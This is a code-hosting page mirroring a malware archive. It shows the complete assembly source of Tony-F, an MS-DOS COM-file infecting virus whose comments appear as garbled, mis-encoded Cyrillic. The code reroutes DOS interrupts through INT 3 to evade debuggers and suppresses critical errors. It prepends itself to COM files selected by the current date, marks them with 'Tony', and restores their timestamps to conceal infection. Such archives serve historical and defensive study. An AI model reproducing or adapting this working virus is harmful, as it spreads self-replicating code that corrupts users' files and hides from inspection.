ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-18 17:36:11 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
a30018ac82
MalwareSourceCode/MSDOS/T-Index/Virus.MSDOS.Unknown.tony-f.asm
vxunderground 4b9382ddbc re-organize 
push
2022-08-21 04:07:57 -05:00

201 lines
7.4 KiB
NASM
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

;------------------------------------------------------------------------------;
; ;
; ‚¨°³± Tony-F ;
; ;
; Tony_F ¥ ¯ ° §¨²¥­ ¢¨°³±,¤¥©±²¢¨¥²® ¬³ ±¥ ±º±²®© ¢ ±«¥¤­®²® - ¯°¨ ±² °²¨° ­¥;
; ­  § ° §¥­ ´ ©« ¢¨°³±º² ¯°¥²º°±¢  ¶¿« ²  ²¥ª³¹  ¤¨°¥ª²®°¨¿ ¨ § ° §¿¢  ¢±¨·ª¨ ;
; ´ ©«®¢¥ ®²£®¢ °¿¹¨ ­  ?*.COM, ª ²® ? § ¢¨±¨ ®² ¤ ² ² . ;
; Tony-F ±¥ ­ ±² ­¿¢  ¯°¥¤¨ ª®¤  ­  § ° §¥­¨¿ ´ ©«, ¢¨°³±º² ®°£ ­¨§¨°  ;
; ±®¡±²¢¥­  ¯°®¶¥¤³°  §  ®¡° ¡®²ª  ­  ª°¨²¨·­¨ £°¥¸ª¨ (¢¥ª²®° 24h) ¨ ­¥ ¯°®¬¥­¿;
; ¤ ² ²  ¨ · ±  ­  § °¿§ ­¨²¥ ´ ©«®¢¥. ;
; Tony-F ­ ¬¨°  ®°¨£¨­ «­¨¿  ¤°¥± ­  ¢¥ª²®° 21h ¨ £® ¯®±² ¢¿ ¢ ² ¡«¨¶ ²  ­  ;
; ¯°¥ªº±¢ ­¨¿²  ª ²® ¢¥ª²®° 3, ² §¨ ®¯¥° ¶¨¿ ¯°¥·¨ ­  ¥¢¥­²³ «­® ²° ±¨° ­¥ ­  ;
; ¢¨°³±  ± ¤¥¡³£¥°. ;
;------------------------------------------------------------------------------;
;  ±¥¬¡«¨° ©²¥ ± Turbo Assembler 2.0+
.model Tiny
.code
VirLen = offset EndCode - offset Start ; „º«¦¨­  ­  ¢¨°³± .
;-----------------------------------------------------------------------------;
Org 07Fh
INT24 db ? ; ’³ª ¹¥ ¡º¤¥ ­ ±®·¥­ ¢¥ª²®° 24h.
Org 0100h
NewDTA db 15h dup (?) ; ‘²°³ª²³°  ­  DTA.
FAttr db ?
FTime dw ?
FDate dw ?
FLen dw ?, ?
FName db 0Dh dup (?)
;-----------------------------------------------------------------------------;
Org 100h
Start:
push ax ; ‡ ¯ §¢  ±º¤º°¦ ­¨¥²® ­  AX.
;...... ’³ª § ¯®·¢  ²º°±¥­¥²® ­  ®°¨£¨­ «­¨¿ ¢¥ª²®° 21h ¢ ±¥£¬¥­²  ­  „Ž‘
mov ax,1203h
int 2Fh ; <20>°®·¨²  ±¥ ±¥£¬¥­²  ­  „Ž‘.
xor si,si ; Ž°¨£¨­ «­¨¿ ¢¥ª²®° ±¥ ²º°±¨ ¯® ¯º°¢¨²¥
Again: ; ²°¨ ¡ ©²  - 2…h,3€h ¨ 26h.
lodsw
cmp ax,3A2Eh
je NextByte
dec si
jnz Again
jmp Done
NextByte:
lodsb
cmp al,26h
jne Again
Found:
sub si,03
mov dx,si
mov ax,2503H ; ¢¥ª²®° 21h ±¥ ¯®±² ¢¿ ­  ¬¿±²®²® ­ 
Int 21h ; ¢¥ª²®° 3.
push cs ; ¢º§±² ­®¢¿¢  ±¥ ±²®©­®±²²  ­  DS.
pop ds
;...... <20>°¥­ ±®·¢ ­¥ ­  ¢¥ª²®°  §  ª°¨²¨·­¨ £°¥¸ª¨
mov INT24,0CFh ; ‘º§¤ ¢  ­®¢ ¢¥ª²®° 24h - Iret
mov ax,2524h
mov dx,offset INT24
Int 3 ; <20>°¥­ ±®·¢  ¢¥ª²®°  24h.
mov ax,cs
add ah,10h
mov es,ax ; ES = CS + 64 KBytes
mov si,offset Start
xor di,di
mov cx,si ; <20>°¥µ¢º°«¿ ª®¤  ­  ¢¨°³±  64KBytes
rep movsb ; ¯®-­ £®°¥ ¢ ¯ ¬¥²² .
mov dx,offset NewDTA ; <20>®±² ¢¿ DTA ­  ­®¢  ¤°¥±.
mov ah,1Ah
Int 3
mov ah,2Ah
Int 3 ; ˆ±ª  ®² „Ž‘ ¤ ² ² ,
add dl,'A' ; ¨ ®² ­¥¿ ±¥ ¯®«³· ¢  ¯º°¢ ²  ¡³ª¢ 
mov AllCom ,dl ; ­  ´ ©«®¢¥²¥ §  § ° §¿¢ ­¥.
;...... ‡ ¯®·¢  ²º°±¥­¥ ­  ´ ©«®¢¥ §  § ° §¿¢ ­¥.
mov dx, offset AllCom ; ’º°±¨ ¢±¨·ª¨ '?*.COM' ´ ©«®¢¥.
mov cl,110B
mov ah,4Eh ; ˆ§¢¨ª¢  Find First.
Int 3
jc Done ; <20>°®¤º«¦ ¢  ­ ² ²ºª ¯°¨ «¨¯±  ­ 
; ´ ©«®¢¥ §  § ° §¿¢ ­¥.
FindNext:
mov dx,offset Fname ; dx  ¤°¥±  ­  ¨¬¥²® ­  ´ ©«  ®² DTA.
mov ax,3D02h ; Ž²¢ °¿ ´ ©«  §  § ¯¨±/·¥²¥­¥.
Int 3
mov bx,ax ; ‡ ¯ §¢  ­®¬¥°  ­  ®²¢®°¥­¨¿ ´ ©«.
push ds ; ‡ ¯ §¢  DS.
push es
pop ds ; DS = CS + 64 KBytes.
mov dx,VirLen ; DX = ¤º«¦¨­ ²  ­  ¢¨°³±  .
mov cx,-1 ; <20>°®·¨²  ±¥ ¶¥«¨¿ ´ ©« ­   ¤°¥± - DS:DX .
mov ah,3Fh ; ’ ¬ ±¥ ­ ¬¨°  ¢¨°³± ,  ±¥£  ±«¥¤ ­¥£®
Int 3 ; ¨ ´ ©«º².
; “¢¥«¨· ¢  ¤º«¦¨­ ²  ­  ´ ©« (AX) ±
add ax,Virlen ; ¤º«¦¨­ ²  ­  ¢¨°³± .
jc Close ; <20>°¨ ¯°¥¯º«¢ ­¥ ´ ©«º² ­¥ ±¥ § ° §¿¢ .
cmp Byte ptr ds:[ Mark + VirLen -100h ],'T' ; „ «¨ ´ ©«º² ¥ § ° §¥­ ¢¥·¥ ?
je Close
push ax ; ‡ ¯ §¢  ¤º«¦¨­ ²  ­  ´ ©«  ¢ ±²¥ª .
xor cx,cx
xor dx,dx
mov ax,4200h ; <20>°¥¬¥±²¢  ±¥ ³ª § ²¥«¿ ­  ´ ©« (CX:DX)
Int 3 ; ¢ ­ · «®²® ¬³.
pop cx ; <20>°®·¨²  ¤º«¦¨­ ²  ­  ´ ©«  ®² ±²¥ª .
; DX ¥ ° ¢­® ­  0 ®² Fn 42.
mov ah,40h ; Ž²  ¤°¥±  DS:DX ±¥ § ¯¨±¢  ­  ¤¨±ª 
Int 3 ; ¢¨°³± + ´ ©«.
mov cx,cs:FTime
mov dx,cs:FDate ; ‚º§±² ­®¢¿¢ ² ±¥ ¤ ² ²  ¨ ¢°¥¬¥²® ­ 
mov ax,5701h ; § ° §¿¢ ­¨¿ ´ ©« ®² DTA.
Int 3
Close:
pop ds ; ‚º§±² ­®¢¿¢  DS.
mov ah,3Eh ; ‡ ²¢ °¿ ´ ©« .
Int 3
mov ah,4Fh
Int 3 ; ˆ§¢¨ª¢  Find Next,
jnc FindNext ;  ª® ¨¬  ®¹¥ ´ ©«®¢¥ ¢±¨·ª® ±¥ ¯®¢² °¿
; ¨ §  ²¿µ.
;....... <20> · «® ­  ±² °²¨° ­¥ ­  ¯°®£° ¬ ²  ªº¬ ª®¿²® ¥ § ª ·¥­ ¢¨°³± .
Done:
mov dx,80h
mov ah,1Ah
Int 3 ; ‚º§±² ­®¢¿¢  ±¥ ±² °¨¿  ¤°¥± ­  DTA.
push es
mov ax,offset TransF -100h ; <20>°¥¤ ¢  ³¯° ¢«¥­¨¥²® ­  ¢¨°³± 
push ax ; ª®©²® ¥ 64 KBytes ¯®-­ £®°¥
RETF ; ®² ¥²¨ª¥² TransF.
;........................................
; Œ °ª¨°®¢ª  §  ° §¯®§­ ¢ ­¥ ­  § ° §¥­¨
Mark db 'Tony' ; ´ ©«®¢¥.
AllCom db '+' ;
db '*.COM',0 ; Œ ±ª  §  ²º°±¥­¥ ­  ¢±¨·ª¨ ´ ©«®¢¥
;.......................................; §  § ° §¿¢ ­¥.
TRansF:
push ds
pop es
pop ax ; ‚º§±² ­®¢¿¢  ±º¤º°¦ ­¨¥²® ­  AX.
mov si,offset EndCode ; ‘¬ºª¢  ª®¤  ­  ¯°®£° ¬ ²  § ¯®·¢ ¹
mov di,offset Start ; ­¥¯®±°¥¤±²¢¥­® ±«¥¤ ¢¨°³±  ± 100h ¡ ©²  ­ ¤®«³.
push ds ; <20>®¤£®²¢¿  ¤°¥±  ¢ ±²¥ª  §  ¯°¥µ®¤ 
push di ; ªº¬ ­ · «®²® ­  ®°¨£¨­ «­ ²  ¯°®£° ¬ .
mov cx,0FFF0h -102h -Virlen
rep movsb
RETF
;-----------------------------------------------------------------------------;
EndCode:
Ret ; Ž² ²³ª § ¯®·¢  § ° §¥­ ²  ¯°®£° ¬ 
;-----------------------------------------------------------------------------;
End Start

Reference in New Issue View Git Blame Copy Permalink